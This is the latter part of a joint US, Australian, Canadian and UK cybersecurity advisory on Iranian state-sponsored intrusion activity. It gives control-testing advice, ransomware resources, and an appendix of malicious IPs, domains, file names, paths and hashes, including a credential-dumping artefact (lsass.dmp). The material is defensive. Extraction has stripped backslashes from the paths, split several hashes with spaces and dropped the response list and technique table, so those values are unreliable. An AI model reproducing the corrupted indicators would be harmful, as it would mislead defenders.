In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

  1. Select an ATT&CK technique described in this advisory (see Appendix B).
  2. Align your security technologies against the technique.
  3. Test your technologies against the technique.
  4. Analyze your detection and prevention technologies performance.
  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESPONDING TO RANSOMWARE OR EXTORTION INCIDENTS

If a ransomware or extortion incident occurs at your organization:

Note: The authoring agencies strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered and may pose sanctions risks.

RESOURCES

  • The U.S. Department of State’s Rewards for Justice (RFJ) program offers a reward of up to $10 million for reports of foreign government malicious activity against U.S. critical infrastructure. See the RFJ website for more information and how to report information securely.
  • For more information on malicious cyber activity affiliated with the Iranian government- sponsored malicious cyber activity, see us-cert.cisa.gov/Iran and FBI’s Iran Threat page.
  • For information and resources on protecting against and responding to ransomware or extortion activity, refer to StopRansomware.gov, the U.S. centralized, whole-of-government webpage providing ransomware resources and alerts.
  • The joint advisory from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States: Technical Approaches to Uncovering and Remediating Malicious Activity provides additional guidance when hunting or investigating a network and common mistakes to avoid in incident handling.
  • CISA offers a range of no-cost cyber hygiene services to help critical infrastructure organizations assess, identify, and reduce their exposure to threats. By requesting these services, organizations of any size could find ways to reduce their risk and mitigate malicious activity.
  • ACSC can provide tailored cyber security advice and assistance, reporting, and incident response support at cyber.gov.au and via 1300 292 371 (1300 CYBER1).

PURPOSE

This advisory was developed by U.S., Australian, Canadian, and UK cybersecurity authorities in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations.

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI, CISA, NSA, USCC-CNMF, DoT, ACSC, CCCS, and NCSC do not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring.

APPENDIX A: INDICATORS OF COMPROMISE

IP addresses and executables files are listed below. For a downloadable copy of IOCs, see AA22- 257A.stix.

IP Addresses

  • 54.39.78[.]148
  • 95.217.193[.]86
  • 104.168.117[.]149
  • 107.173.231[.]114
  • 144.76.186[.]88
  • 148.251.71[.]182
  • 172.245.26[.]118
  • 185.141.212[.]131
  • 198.12.65[.]175
  • 198.144.189[.]74

Note: Some of these observed IP addresses may be outdated. The authoring agencies recommend organizations investigate or vet these IP addresses prior to taking action, such as blocking.

Malicious Domains

  • newdesk[.]top
  • symantecserver[.]co
  • msupdate[.]us
  • msupdate[.]top
  • gupdate[.]us
  • aptmirror[.]eu
  • buylap[.]top
  • winstore[.]us
  • tcp443[.]org
  • mssync[.]one
  • upmirror[.]top
  • tcp443 (subdomain)
  • kcp53 (subdomain)

Files

Malicious files observed in this activity are identified in Table 1. Many of the below malicious files are masquerading as legitimate Windows files; therefore, file names alone should not be treated as an indicator of compromise. Note: For additional malicious files observed, see joint CSA Iranian Government-Sponsored APT Cyber Actors Exploiting Microsoft Exchange and Fortinet Vulnerabilities in Furtherance of Malicious Activities.

Filename:

Wininet[.]xml

Path:

C:WindowsTempwininet[.]xml

MD5:

d2f4647a3749d30a35d5a8faff41765e

SHA-1:

0f676bc786db3c44cac4d2d22070fb514b4cb64c

SHA-256:

559d4abe3a6f6c93fc9eae24672a49781af140c43d491a757c8e975507b4032e

Filename:

Wininet’[.]xml

MD5:

2e1e17a443dc713f13f45a9646fc2179

SHA-1:

e75bfc0dd779d9d8ac02798b090989c2f95850dc

Filename:

WinLogon[.]xml

Path:

C:WindowsTempWinLogon[.]xml

MD5:

49c71178fa212012d710f11a0e6d1a30

SHA-1:

226f0fbb80f7a061947c982ccf33ad65ac03280f

SHA-256:

bcc2e4d96e7418a85509382df6609ec9a53b3805effb7ddaed093bdaf949b6ea

Filename:

Wininet[.]bat

Path:

C:Windowswininet[.]bat

MD5:

5f098b55f94f5a448ca28904a57c0e58

SHA-1:

27102b416ef5df186bd8b35190c2a4cc4e2fbf37

SHA-256:

668ec78916bab79e707dc99fdecfa10f3c87ee36d4dee6e3502d1f5663a428a0

Filename:

Winlogon[.]bat

Path:

C:Windowswinlogon[.]bat

MD5:

7ac4633bf064ebba9666581b776c548f

SHA-1:

524443dd226173d8ba458133b0a4084a172393ef

SHA-256:

d14d546070afda086a1c7166eaafd9347a15a32e6be6d5d029064bfa9ecdede7

Filename:

CacheTask[.]bat

Path:

C:ProgramDataMicrosoftCacheTask[.]bat

MD5:

ee8fd6c565254fe55a104e67cf33eaea

SHA-1:

24ed561a1ddbecd170acf1797723e5d3c51c2f5d

SHA-256:

c1723fcad56a7f18562d14ff7a1f030191ad61cd4c44ea2b04ad57a7eb5e2837

Filename:

Task_update[.]exe

Path:

C:WindowsTemptask_update[.]exe

MD5:

cacb64bdf648444e66c82f5ce61caf4b

SHA-1:

3a6431169073d61748829c31a9da29123dd61da8

SHA-256:

12c6da07da24edba13650cd324b2ad04d0a0526bb4e853dee03c094075ff6d1a

Filename:

Task[.]exe

MD5:

5b646edb1deb6396082b214a1d93691b

SHA-1:

763ca462b2e9821697e63aa48a1734b10d3765ee

SHA-256:

17e95ecc7fedcf03c4a5e97317cfac166b337288562db0095ccd24243a93592f

Filename:

dllhost[.]exe

Path:

C:Windowsdllhost[.]exe

MD5:

0f8b592126cc2be0e9967d21c40806bc

9a3703f9c532ae2ec3025840fa449d4e

SHA-1:

3da45558d8098eb41ed7db5115af5a2c6 1c543af

8ece87086e8b5aba0d1cc4ec3804bf74e 0b45bee

SHA-256:

724d54971c0bba8ff32aeb6044d3b3fd57 1b13a4c19cada015ea4bcab30cae26

1604e69d17c0f26182a3e3ff65694a4945

0aafd56a7e8b21697a932409dfd81e

Filename:

svchost[.]exe

Path:

C:Windowssvchost[.]exe

MD5:

68f58e442fba50b02130eedfc5fe4e5b

298d41f01009c6d6240bc2dc7b769205

SHA-1:

76dd6560782b13af3f44286483e157848

efc0a4e

6ca62f4244994b5fbb8a46bdfe62aa1c95 8cebbd

SHA-256:

b04b97e7431925097b3ca4841b894139 7b0b88796da512986327ff66426544ca

8aa3530540ba023fb29550643beb00c9c 29f81780056e02c5a0d02a1797b9cd9

Filename:

User[.]exe

Path:

C:WindowsTempuser[.]exe

MD5:

bd131ebfc44025a708575587afeebbf3

f0be699c8aafc41b25a8fc0974cc4582

SHA-1:

8b23b14d8ec4712734a5f6261aed40942 c9e0f68

6bae2d45bbd8c4b0a59ba08892692fe86 e596154

SHA-256:

b8a472f219658a28556bab4d6d109fdf3 433b5233a765084c70214c973becbbd

7b5fbbd90eab5bee6f3c25aa3c2762104 e219f96501ad6a4463e25e6001eb00b

Filename:

Setup[.]bat

Path:

C:UsersDefaultAccountDesktopNew foldersetup[.]bat

MD5:

7fdc2d007ef0c1946f1f637b87f81590

Filename:

Ssasl[.]pmd

Path:

C:WindowsTempssasl[.]pmd

Filename:

Ssasl[.]zip

Path:

C:WindowsTempssasl[.]zip

Filename:

netscanold[.]exe

Path:

C:UsersDefaultAccountDesktopnetscanoldnetscanold[.]exe

Filename:

scan[.]csv

Path:

C:UsersDefaultAccountDesktopscan[.]csv

Filename:

lsass[.]dmp

Path:

C:UsersDefaultAccountAppDataLocalTemplsass[.]dmp

Filename:

lsass[.]zip

Path:

C:UsersDefaultAccountAppDataLocalTemplsass[.]zip

 

APPENDIX B: MITRE ATT&CK TACTICS AND TECHNIQUES

Table 2 identifies MITRE ATT&CK Tactics and techniques observed in this activity.

Revisions

September 14, 2022: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.